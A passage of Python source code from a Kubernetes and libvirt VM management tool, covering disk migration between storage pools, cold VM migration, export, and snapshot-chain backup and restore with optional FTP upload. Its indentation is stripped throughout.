remote_dev_pool = pool['pool']
if remote_dev_pool:
ip = get_node_ip_by_node_name(pool_node_name)
remote_disk_prepare(ip, disk_info['poolname'], sourceVol, disk_info['uni'])
op = Operation('kubesds-adm migrateDisk --pool %s --vol %s' % (remote_dev_pool, sourceVol), {},
ip=ip, remote=True, with_result=True)
result = op.execute()
if result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'can not migrate disk on remote node.')
else:
if source_pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]: # file to dev
raise ExecuteException('RunCmdError', 'not supported: can not migrate a file-backed disk to a dev pool.')
# # create disk
# newCreateInfo = cstor_create_disk(pool_info['poolname'], params.vol, disk_info['virtual_size'])
# uni = newCreateInfo["data"]["uni"]
# op = Operation('qemu-img convert -f %s %s -O raw %s' % (disk_info['format'], disk_info['filename'], prepareInfo['data']['path']),
# {})
# op.execute()
# if pool_node_name != disk_node_name:
# cstor_release_disk(pool_info['poolname'], params.vol, uni)
# ip = get_node_ip_by_node_name(pool_node_name)
# remotePrepareInfo = remote_cstor_disk_prepare(ip, pool_info['poolname'], params.vol, uni)
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": remotePrepareInfo["data"]["path"],
# "virtual_size": remotePrepareInfo["data"]["size"],
# "filename": remotePrepareInfo["data"]["path"]
# }
# disk_heler.change_node(params.vol, pool_node_name)
# else:
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": prepareInfo["data"]["path"],
# "virtual_size": prepareInfo["data"]["size"],
# "filename": prepareInfo["data"]["path"]
# }
# disk_heler.update(params.vol, 'volume', result)
# # release old disk
# cstor_release_disk(disk_info['poolname'], params.vol, disk_info['uni'])
# cstor_delete_disk(disk_info['poolname'], params.vol)
# # delete disk
# op = Operation('rm -rf %s/%s' % (source_pool_info['path'], params.vol))
# op.execute()
else: # dev to dev
# same poolname, just prepare and release
if disk_info['poolname'] == pool_info['poolname']:
if pool_node_name == disk_node_name:
raise ExecuteException('RunCmdError', 'can not migrate disk to its pool.')
else:
# remote prepare disk
ip = get_node_ip_by_node_name(pool_node_name)
prepareInfo = remote_disk_prepare(ip, disk_info['poolname'], sourceVol, disk_info['uni'])
# release old disk
result = {
"disk": sourceVol,
"pool": targetPool,
"poolname": pool_info['poolname'],
"uni": prepareInfo["data"]["uni"],
"current": prepareInfo["data"]["path"],
"virtual_size": disk_info['virtual_size'],
"filename": prepareInfo["data"]["path"]
}
disk_heler.update(sourceVol, 'volume', result)
disk_heler.change_node(sourceVol, pool_node_name)
else:
raise ExecuteException('RunCmdError',
'can not migrate disk to this pool. Not support operation.')
# source_pool_info = get_pool_info_from_k8s(disk_info['pool'])
# if pool_info['path'] == source_pool_info['path']:
# raise ExecuteException('RunCmdError',
# 'can not migrate disk to this pool. Because their uni is equal.')
# # raise ExecuteException('RunCmdError', 'can not migrate disk to this pool. Because their poolname is not equal.')
# # prepare disk
# prepareInfo = cstor_disk_prepare(disk_info['poolname'], params.vol, disk_info['uni'])
# ifFile = prepareInfo["data"]["path"]
# # create same disk in target pool
# newCreateInfo = cstor_create_disk(pool_info['poolname'], params.vol, disk_info['virtual_size'])
# uni = newCreateInfo["data"]["uni"]
# # dd
# op = Operation('dd if=%s of=%s' % (ifFile, ofFile), {})
# op.execute()
# if pool_node_name != disk_node_name:
# cstor_release_disk(pool_info['poolname'], params.vol, uni)
# ip = get_node_ip_by_node_name(pool_node_name)
# remotePrepareInfo = remote_cstor_disk_prepare(ip, pool_info['poolname'], params.vol, uni)
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": remotePrepareInfo["data"]["path"],
# "virtual_size": remotePrepareInfo["data"]["size"],
# "filename": remotePrepareInfo["data"]["path"]
# }
# disk_heler.change_node(params.vol, pool_node_name)
# else:
# # register to k8s
# result = {
# "disk": params.vol,
# "pool": params.pool,
# "poolname": pool_info['poolname'],
# "uni": newCreateInfo["data"]["uni"],
# "current": newPrepareInfo["data"]["path"],
# "virtual_size": newPrepareInfo["data"]["size"],
# "filename": newPrepareInfo["data"]["path"]
# }
# disk_heler.update(params.vol, 'volume', result)
# # release old disk
# cstor_release_disk(disk_info['poolname'], params.vol, disk_info['uni'])
# cstro_delete_disk(disk_info['poolname'], params.vol)
def migrateDisk(params):
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
migrateDiskFunc(params.vol, params.pool)
success_print("success migrate disk.", {})
def modifyVM(params):
modifyVMOnNode(params.domain)
success_print("success modifyVM.", {})
# cold migrate
def migrateVMDisk(params):
if is_vm_active(params.domain):
raise ExecuteException('', 'error: vm is still running, plz stop it firstly.')
if not is_vm_disk_driver_cache_none(params.domain):
raise ExecuteException('', 'error: disk driver cache is not none')
# if not is_vm_disk_not_shared_storage(params.domain):
# raise ExecuteException('', 'error: still has disk not create in shared storage.')
# prepare all disk
specs = get_disks_spec(params.domain)
vmVols = []
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
vmVols.append(prepare_info['disk'])
vps = []
migrateVols = []
notReleaseVols = []
for line in params.migratedisks.split(';'):
vp = {}
vol = None
pool = None
for arg in line.split(','):
if arg.split('=')[0] == 'vol':
vol = arg.split('=')[1]
if arg.split('=')[0] == 'pool':
pool = arg.split('=')[1]
if vol and pool:
logger.debug('1519: %s' % vol)
prepare_info = get_disk_prepare_info_by_path(vol)
source_pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# ignore
if prepare_info['pool'] == pool:
continue
target_pool_info = get_pool_info_from_k8s(pool)
# check_pool_active(target_pool_info)
migrateVols.append(vol)
notReleaseVols.append(prepare_info['disk'])
vp['disk'] = prepare_info['disk']
vp['vol'] = prepare_info['path']
vp['pool'] = pool
vp['oldpool'] = prepare_info['pool']
vps.append(vp)
else:
raise ExecuteException('RunCmdError', 'migratedisks param is illegal.')
uuid = randomUUID().replace('-', '')
xmlfile = '/tmp/%s.xml' % uuid
logger.debug("xmlfile: %s" % xmlfile)
op = Operation('virsh dumpxml %s > %s' % (params.domain, xmlfile), {})
op.execute()
# get disk node label in ip
node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
logger.debug('vps: ' + dumps(vps))
if params.ip in get_host_IP():
# not migrate vm, just migrate some disk to other pool
for disk_path in list(specs.keys()):
# prepare
prepare_info = get_disk_prepare_info_by_path(disk_path)
logger.debug(specs)
try:
for vp in vps:
vol = vp['disk']
logger.debug('migrate disk %s to %s.' % (vol, vp['pool']))
migrateDiskFunc(vol, vp['pool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except Exception as e:
for vp in vps:
try:
vol = vp['disk']
logger.debug('error occur, migrate disk %s to %s.' % (vol, vp['oldpool']))
disk_info = get_vol_info_from_k8s(vol)
if disk_info['pool'] != vp['oldpool']:
migrateDiskFunc(vol, vp['oldpool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except:
pass
raise e
op = Operation('virsh define %s' % xmlfile, {})
op.execute()
modifyVMOnNode(params.domain)
success_print("migrate vm disk %s successful." % params.domain, {})
else:
# migrate vm to another node
if node_name:
# for disk_path in specs.keys():
# # prepare
# prepare_info = get_disk_prepare_info_by_path(disk_path)
# if disk_path not in migrateVols:
# # remote prepare
# remote_prepare_disk_by_path(params.ip, prepare_info['path'])
all_jsondicts = []
logger.debug(specs)
try:
for disk_path in list(specs.keys()):
if disk_path not in migrateVols:
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
remote_start_pool(params.ip, targetPool)
if targetPool:
logger.debug("targetPool is %s." % targetPool)
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', 'vdiskfs']:
prepare_disk_by_path(prepare_info['path'])
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool,
config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
raise ExecuteException('', 'can not find pool has same poolname %s on %s' % (pool_info['poolname'], params.ip))
remote_prepare_disk_by_path(params.ip, prepare_info['path'])
else:
logger.debug(vps)
logger.debug('migrate disks')
for vp in vps:
vol = get_disk_prepare_info_by_path(vp['vol'])['disk']
logger.debug('migrate disk %s to %s.' % (vol, vp['pool']))
migrateDiskFunc(vol, vp['pool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except ExecuteException as e:
for vp in vps:
try:
pool_active(vp['oldpool'])
migrateDiskFunc(vp['disk'], vp['oldpool'])
except:
logger.debug(traceback.format_exc())
logger.debug(traceback.format_exc())
raise e
try:
try:
delete_vm_cdrom_file_in_xml(xmlfile)
except:
pass
op = Operation('scp %s root@%s:%s' % (xmlfile, params.ip, xmlfile), {})
op.execute()
op = Operation('virsh define %s' % xmlfile, {}, ip=params.ip, remote=True)
op.execute()
try:
op = Operation('virsh start %s' % params.domain, {}, ip=params.ip, remote=True)
op.execute()
except:
pass
except ExecuteException as e:
try:
op = Operation('virsh undefine %s' % params.domain, {}, ip=params.ip, remote=True)
op.execute()
except:
pass
for vp in vps:
try:
migrateDiskFunc(vp['disk'], vp['oldpool'])
except:
logger.debug(traceback.format_exc())
logger.debug(traceback.format_exc())
raise e
for vol in vmVols:
if vol not in notReleaseVols:
# release
release_disk_by_metadataname(vol)
apply_all_jsondict(all_jsondicts)
op = Operation('kubesds-adm modifyVM --domain %s' % params.domain, {}, ip=params.ip, remote=True,
with_result=True)
result = op.execute()
if result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'can not modify vm on k8s.')
vmHelper = K8sHelper('VirtualMachine')
vmHelper.change_node(params.domain, node_name)
op = Operation('virsh undefine %s' % params.domain, {})
op.execute()
success_print("migrate vm disk %s successful." % params.domain, {})
else:
error_print(1, 'can not migrate vm disk, can not find target node.')
def exportVM(params):
if not is_vm_exist(params.domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % params.domain)
target_path = '%s/%s' % (params.path, params.domain)
if not os.path.exists(target_path):
os.makedirs(target_path)
# save vm xml file
op = Operation('virsh dumpxml %s > %s/%s.xml' % (params.domain, target_path, params.domain), {})
op.execute()
disk_specs = get_disks_spec(params.domain)
for disk_path in list(disk_specs.keys()):
disk_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(pool_info)
disk_path = disk_info['path']
if pool_info['pooltype'] == 'localfs':
if not os.path.exists(disk_path):
raise ExecuteException('', 'vm disk file %s not exist, plz check it.' % disk_path)
dest = '%s/%s' % (target_path, os.path.basename(disk_path))
# snapshot
op1 = Operation('cp -f %s %s' % (disk_path, dest), {})
op1.execute()
qemu_info = get_disk_info(dest)
if 'full_backing_filename' in list(qemu_info.keys()):
disk_format = qemu_info['format']
op2 = Operation('qemu-img rebase -f %s -b "" %s' % (disk_format, dest), {})
op2.execute()
success_print("success exportVM.", {})
def backupDisk(params):
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
backup_helper = K8sHelper('VirtualMachineBackup')
if backup_helper.exist(params.version):
raise ExecuteException('', 'backup %s has exist, plz use another version. plz check it.' % params.version)
logger.debug('params!!!!')
logger.debug(params)
if params.full:
full_version = params.version
backup_vm_disk(params.domain, params.pool, params.vol, params.version, params.full, None, False)
else:
full_version = get_disk_backup_current(params.domain, params.pool, params.vol)
logger.debug(full_version)
backup_vm_disk(params.domain, params.pool, params.vol, params.version, params.full, None, False)
data = {
'domain': params.domain,
'pool': params.pool,
'time': time.time(),
'disk': params.vol,
'full': full_version
}
backup_helper.create(params.version, 'backup', data)
backup_helper.add_label(params.version, params.domain)
if params.remote:
push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port,
params.username, params.password)
success_print("success backupDisk.", {})
def backup_vm_disk(domain, pool, disk, version, is_full, full_version, is_backup_VM):
# check vm exist or not
if not is_vm_exist(domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % domain)
disk_info = get_vol_info_from_k8s(disk)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_specs = get_disks_spec(domain)
vm_disks = {}
disk_tag = {}
for disk_path in list(disk_specs.keys()):
disk_mn = try_get_diskmn_by_path(disk_path)
vm_disks[disk_mn] = disk_path
disk_tag[disk_mn] = disk_specs[disk_path]
if disk not in list(vm_disks.keys()):
raise ExecuteException('', 'domain does not attach disk %s, can not find disk %s in domain %s xml.' % (disk, disk, domain))
# check backup version exist or not
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
history_file_path = '%s/history.json' % disk_backup_dir
if is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'disk %s backup version %s has exist, plz use another version.' % (
disk, version))
# do vm snapshots
uuid = randomUUID().replace('-', '')
cmd = 'virsh snapshot-create-as --domain %s --name %s --atomic --disk-only --no-metadata ' % (domain, uuid)
disk_prepare(disk_info['poolname'], disk, disk_info['uni'])
disk_dir = '%s/%s' % (disk_pool_info['path'], disk)
ss_path = '%s/%s' % (disk_dir, uuid)
cmd = '%s --diskspec %s,snapshot=external,file=%s,driver=qcow2' % (cmd, disk_specs[vm_disks[disk]], ss_path)
for disk_path in list(disk_specs.keys()):
if disk_path != vm_disks[disk]:
cmd = '%s --diskspec %s,snapshot=no' % (cmd, disk_specs[disk_path])
if not os.path.exists(disk_dir):
raise ExecuteException('', 'vm disk %s dir %s not exist, plz check it.' % (disk, disk_dir))
op = Operation(cmd, {})
op.execute()
# backup disk dir
if full_version: # vm backup, use vm full version
current_full_version = full_version
else:
if is_full:
current_full_version = version
else:
current_full_version = get_disk_backup_current(domain, pool, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
backup_dir = '%s/%s' % (disk_backup_dir, current_full_version)
backed_disk_file = []
try:
chain, backed_disk_file = backup_snapshots_chain(ss_path, backup_dir)
# write backup record
if not os.path.exists(history_file_path):
history = {}
else:
with open(history_file_path, 'r') as f:
history = load(f)
if current_full_version not in list(history.keys()):
history[current_full_version] = {}
count = len(list(history[current_full_version].keys()))
chain['index'] = count + 1
chain['time'] = time.time()
history[current_full_version][version] = chain
if not is_backup_VM:
history['current'] = current_full_version
with open(history_file_path, 'w') as f:
dump(history, f)
except ExecuteException as e:
try:
for df in backed_disk_file:
op = Operation('rm -f %s' % df, {})
op.execute()
except:
pass
raise e
finally:
# change disk current
# change_vol_current(disk, ss_path)
base = None
if os.path.exists(ss_path):
base = DiskImageHelper.get_backing_file(ss_path)
if base and os.path.exists(base):
if is_vm_active(domain):
op = Operation(
'virsh blockcommit --domain %s %s --base %s --pivot --active' % (domain, disk_tag[disk], base),
{})
op.execute()
else:
op = Operation('qemu-img commit -b %s %s' % (base, ss_path), {})
op.execute()
change_vm_os_disk_file(domain, ss_path, base)
try:
op = Operation('rm -f %s' % ss_path, {})
op.execute()
pool_info = get_pool_info_from_k8s(pool)
config = get_disk_config(pool_info['poolname'], disk)
write_config(disk, disk_dir, base, config['pool'], config['poolname'])
modify_disk_info_in_k8s(config['poolname'], disk)
except:
pass
return backed_disk_file
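# restore_vm_disk: rebuild a disk from a recorded backup chain. With newname and
# target set, the chain is restored into a brand-new volume in the target pool
# and registered in k8s; otherwise it is restored in place for the (stopped)
# domain and the domain XML plus the disk's "current" pointer are updated.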
def restore_vm_disk(domain, pool, disk, version, newname, target):
if newname and target is None:
        raise ExecuteException('', 'newname and target must be set together.')
# check vm exist or not
if not newname and not is_vm_exist(domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % domain)
if not newname and is_vm_active(domain):
raise ExecuteException('', 'domain %s is still running. plz stop it first.' % domain)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
raise ExecuteException('', 'not exist disk %s backup dir %s' % (disk, disk_backup_dir))
# check backup version exist or not
history_file_path = '%s/history.json' % disk_backup_dir
if not is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'not exist disk %s backup version in history file %s' % (disk, history_file_path))
with open(history_file_path, 'r') as f:
history = load(f)
full_version = get_full_version(domain, pool, disk, version)
if newname:
if newname is None or target is None:
raise ExecuteException('', 'new disk name or target pool must be set.')
disk_heler = K8sHelper('VirtualMachineDisk')
if disk_heler.exist(newname):
raise ExecuteException('', 'new disk %s has exist' % newname)
disk_pool_info = get_pool_info_from_k8s(target)
check_pool_active(disk_pool_info)
if not os.path.exists(disk_pool_info['path']):
raise ExecuteException('', 'not exist pool %s mount path %s.' % (target, disk_pool_info['path']))
new_disk_dir = '%s/%s' % (disk_pool_info['path'], newname)
if not os.path.exists(new_disk_dir):
os.mkdir(new_disk_dir)
disk_back_dir = '%s/%s/diskbackup' % (disk_backup_dir, full_version)
backupRecord = history[full_version][version]
current, file_to_delete = restore_snapshots_chain(disk_back_dir, backupRecord, new_disk_dir)
write_config(newname, os.path.dirname(current), current, target, disk_pool_info['poolname'])
disk_heler.create(newname, "volume", get_disk_info_to_k8s(disk_pool_info['poolname'], newname))
else:
disk_info = get_vol_info_from_k8s(disk)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
disk_specs = get_disks_spec(domain)
vm_disks = {}
for disk_path in list(disk_specs.keys()):
disk_mn = try_get_diskmn_by_path(disk_path)
vm_disks[disk_mn] = disk_path
if disk not in list(vm_disks.keys()):
            raise ExecuteException('', 'disk %s is not attached to the domain, can not find disk %s in domain %s xml.' % (
disk, disk, domain))
# do vm snapshots
disk_back_dir = '%s/%s/diskbackup' % (disk_backup_dir, full_version)
disk_dir = '%s/%s' % (disk_pool_info['path'], disk_info['disk'])
# restore disk dir
backupRecord = history[full_version][version]
current, file_to_delete = restore_snapshots_chain(disk_back_dir, backupRecord, disk_dir)
# change vm disk
modofy_vm_disks(domain, {vm_disks[disk]: current})
# change disk current
change_vol_current(disk, current)
for file in file_to_delete:
runCmd('rm -f %s' % file)
return current
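# CLI entry: restore a single disk backup and, if params.targetDomain is set, attach the
# restored disk to that domain afterwards.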
def restoreDisk(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
if params.targetDomain:
if not is_vm_exist(params.targetDomain):
            raise ExecuteException('', 'target domain %s does not exist. plz check it.' % params.targetDomain)
current = restore_vm_disk(params.domain, params.pool, params.vol, params.version, params.newname, params.target)
# attach vm disk
if params.targetDomain:
attach_vm_disk(params.targetDomain, current)
success_print("success restoreDisk.", {})
def backupVM(params):
backup_helper = K8sHelper('VirtualMachineBackup')
if backup_helper.exist(params.version):
raise ExecuteException('', 'backup %s has exist, plz use another version. plz check it.' % params.version)
if not is_vm_exist(params.domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % params.domain)
if params.remote:
if is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username,
params.password):
raise ExecuteException('', 'domain %s has exist backup version %s in ftp server. plz check it.' % (
params.domain, params.version))
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
history_file_path = '%s/history.json' % backup_dir
if is_vm_backup_exist(params.domain, params.pool, params.version):
raise ExecuteException('', 'domain %s has exist backup version %s in %s. plz check it.' % (
params.domain, params.version, history_file_path))
disk_tags = {}
disk_specs = get_disks_spec(params.domain)
# do vm snapshots
os_disk_tag, os_disk_path = get_os_disk(params.domain)
for disk_path in list(disk_specs.keys()):
if not params.all and disk_specs[disk_path] != os_disk_tag:
continue
disk_mn = try_get_diskmn_by_path(disk_path)
disk_info = get_vol_info_from_k8s(disk_mn)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
disk_dir = '%s/%s' % (disk_pool_info['path'], disk_info['disk'])
if not os.path.exists(disk_dir):
raise ExecuteException('', 'vm disk dir %s not exist, plz check it.' % disk_dir)
disk_tags[disk_mn] = disk_specs[disk_path]
history = {}
if os.path.exists(history_file_path):
with open(history_file_path, 'r') as f:
history = load(f)
disk_full_version = None
newestV = None
if not params.full:
if len(list(history.keys())) == 0:
            raise ExecuteException('', 'domain %s has no full backup in %s, plz make a full backup first.' % (
                params.domain, history_file_path))
btime = 0.0
for v in list(history.keys()):
not_match = False
for disk in disk_tags:
if disk not in list(history[v].keys()):
not_match = True
if not_match:
continue
for disk in list(history[v].keys()):
if history[v][disk]['time'] > btime:
btime = history[v][disk]['time']
newestV = v
if newestV is None:
raise ExecuteException('', 'can not find all disk full backup record, maybe you should make a full backup')
disk_full_version = {}
for disk in list(history[newestV].keys()):
disk_full_version[disk] = history[newestV][disk]['full']
# check domain all disk has full backup
if not params.full:
for disk in list(disk_tags.keys()):
if disk not in list(disk_full_version.keys()):
raise ExecuteException('', 'vm %s disk %s may be first attach, plz make full backup firstly.' % (
params.domain, disk))
if not disk_tags:
raise ExecuteException('', 'not exist disk need to backup.')
# save vm xml file
xml_file = '%s/%s.xml' % (backup_dir, params.version)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
op = Operation('virsh dumpxml %s > %s' % (params.domain, xml_file), {})
op.execute()
delete_vm_cdrom_file_in_xml(xml_file)
# backup disk
all_backed_disk_file = []
disk_version = {}
try:
for disk in list(disk_tags.keys()):
uuid = randomUUID().replace('-', '')
disk_version[disk] = uuid
if disk_full_version:
logger.debug('disk_full_version')
logger.debug(disk_full_version)
backed_disk_file = backup_vm_disk(params.domain, params.pool, disk, uuid, params.full,
disk_full_version[disk], True)
else:
backed_disk_file = backup_vm_disk(params.domain, params.pool, disk, uuid, True, None, True)
if backed_disk_file and isinstance(backed_disk_file, list):
all_backed_disk_file.extend(backed_disk_file)
history[params.version] = {}
for disk in list(disk_version.keys()):
if disk_full_version:
history[params.version][disk] = {
'time': time.time(),
'tag': disk_tags[disk],
'version': disk_version[disk],
'full': disk_full_version[disk]
}
else:
history[params.version][disk] = {
'time': time.time(),
'tag': disk_tags[disk],
'version': disk_version[disk],
'full': disk_version[disk]
}
if newestV:
history[params.version][disk]['vm_full'] = history[newestV][disk]['vm_full']
else:
history[params.version][disk]['vm_full'] = params.version
with open(history_file_path, 'w') as f:
dump(history, f)
except Exception as e:
try:
for disk in list(disk_version.keys()):
try:
delete_disk_backup(params.domain, params.pool, disk, disk_version[disk])
logger.debug('backup vm %s fail, delete backuped disk %s version %s' % (
params.domain, disk, disk_version[disk]))
except:
pass
except:
pass
try:
del history[params.version]
with open(history_file_path, 'w') as f:
dump(history, f)
except:
pass
try:
logger.debug('all_backed_disk_file: %s' % dumps(all_backed_disk_file))
for df in all_backed_disk_file:
op = Operation('rm -f %s' % df, {})
op.execute()
except:
pass
logger.debug(traceback.format_exc())
raise e
if params.remote:
# history file
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
if ftp.is_exist_file(ftp_history_file):
ftp_history = ftp.get_json_file_data(ftp_history_file)
else:
ftp_history = {}
# upload file
fin = []
record = history[params.version]
try:
for disk in list(record.keys()):
push_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote,
params.port, params.username, params.password)
fin.append(disk)
ftp.upload_file(xml_file, '/vmbackup/%s' % params.domain)
except Exception as e:
for disk in fin:
delete_remote_disk_backup(params.domain, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
for disk in list(record.keys()):
delete_disk_backup(params.domain, params.pool, disk, record[disk]['version'])
del history[params.version]
with open(history_file_path, 'w') as f:
dump(history, f)
logger.debug(traceback.format_exc())
raise ExecuteException('', 'can not upload backup record to ftp server.')
ftp_history[params.version] = history[params.version]
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file("/tmp/history.json", '/vmbackup/%s' % params.domain)
data = {
'domain': params.domain,
'pool': params.pool,
'time': time.time(),
'disk': '',
'version': params.version
}
if newestV:
data['full'] = newestV
else:
data['full'] = params.version
backup_helper.create(params.version, 'backup', data)
backup_helper.add_label(params.version, params.domain)
success_print("success backupVM.", {})
def restoreVM(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
if not params.newname and is_vm_active(params.domain):
raise ExecuteException('', 'vm %s is still active, plz stop it first.' % params.domain)
# default backup path
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
history_file = '%s/history.json' % backup_dir
if not is_vm_backup_exist(params.domain, params.pool, params.version):
raise ExecuteException('', 'domain %s not has backup %s, location: %s.' % (
params.domain, params.version, history_file))
disk_version = {}
with open(history_file, 'r') as f:
history = load(f)
record = history[params.version]
for disk in list(record.keys()):
disk_version[disk] = record[disk]['version']
if is_vm_exist(params.domain):
disk_specs = get_disks_spec(params.domain)
else:
disk_specs = get_disks_spec_by_xml('%s/%s.xml' % (backup_dir, params.version))
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug("debugcode")
logger.debug(dumps(pool_info))
# be sure vm still use the disks in the backup record.
vm_disks = []
for disk_path in list(disk_specs.keys()):
vm_disk = try_get_diskmn_by_path(disk_path)
vm_disks.append(vm_disk)
if params.all:
for disk in list(disk_version.keys()):
if disk not in vm_disks:
raise ExecuteException('', 'some disk in backup %s has not been attached in domain %s.' % (
dumps(disk_version), params.domain))
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
vm_xml_file = '%s/%s.xml' % (backup_dir, params.version)
os_disk_tag, os_disk_path = get_os_disk_by_xml(vm_xml_file)
# restore vm disk snapshot chain
for disk in list(record.keys()):
if not params.all and record[disk]['tag'] != os_disk_tag:
continue
disk_info = get_vol_info_from_k8s(disk)
disk_prepare(disk_info['poolname'], disk, disk_info['uni'])
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
# restore vm disk snapshot chain
disk_currents = {}
for disk in list(disk_version.keys()):
if not params.all and record[disk]['tag'] != os_disk_tag:
continue
if params.newname:
if record[disk]['tag'] == os_disk_tag:
newdisk = params.newname
else:
newdisk = randomUUID().replace('-', '')
current = restore_vm_disk(params.domain, params.pool, disk, disk_version[disk], newdisk, params.target)
else:
current = restore_vm_disk(params.domain, params.pool, disk, disk_version[disk], None, None)
disk_currents[disk] = current
if params.newname:
# current.
source_to_target = {}
disk_specs = get_disks_spec_by_xml(vm_xml_file)
logger.debug(disk_version)
logger.debug(disk_specs)
logger.debug(disk_currents)
for name in list(disk_version.keys()):
for disk_path in list(disk_specs.keys()):
if disk_path.find(name) >= 0 and name in list(disk_currents.keys()):
logger.debug(dumps(disk_currents))
logger.debug(name)
source_to_target[disk_path] = disk_currents[name]
break
define_and_restore_vm_disks(vm_xml_file, params.newname, source_to_target)
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
success_print("success restoreVM.", {})
def delete_disk_backup(domain, pool, disk, version):
# default backup path
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
full_version = get_full_version(domain, pool, disk, version)
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(backup_dir):
return
# raise ExecuteException('', 'disk %s not has backup %s, location: %s.' % (
# disk, version, backup_dir))
history_file = '%s/history.json' % backup_dir
if not os.path.exists(history_file):
return
# raise ExecuteException('', 'can not find disk %s backup record %s' % (disk, version))
checksum_to_deletes = []
with open(history_file, 'r') as f:
history = load(f)
for chain in history[full_version][version]['chains']:
checksum_to_deletes.append(chain['checksum'])
# be sure disk backup not used by other backup record.
for v in list(history[full_version].keys()):
if v == version:
continue
chains = history[full_version][v]['chains']
for chain in chains:
if chain['checksum'] in checksum_to_deletes:
checksum_to_deletes.remove(chain['checksum'])
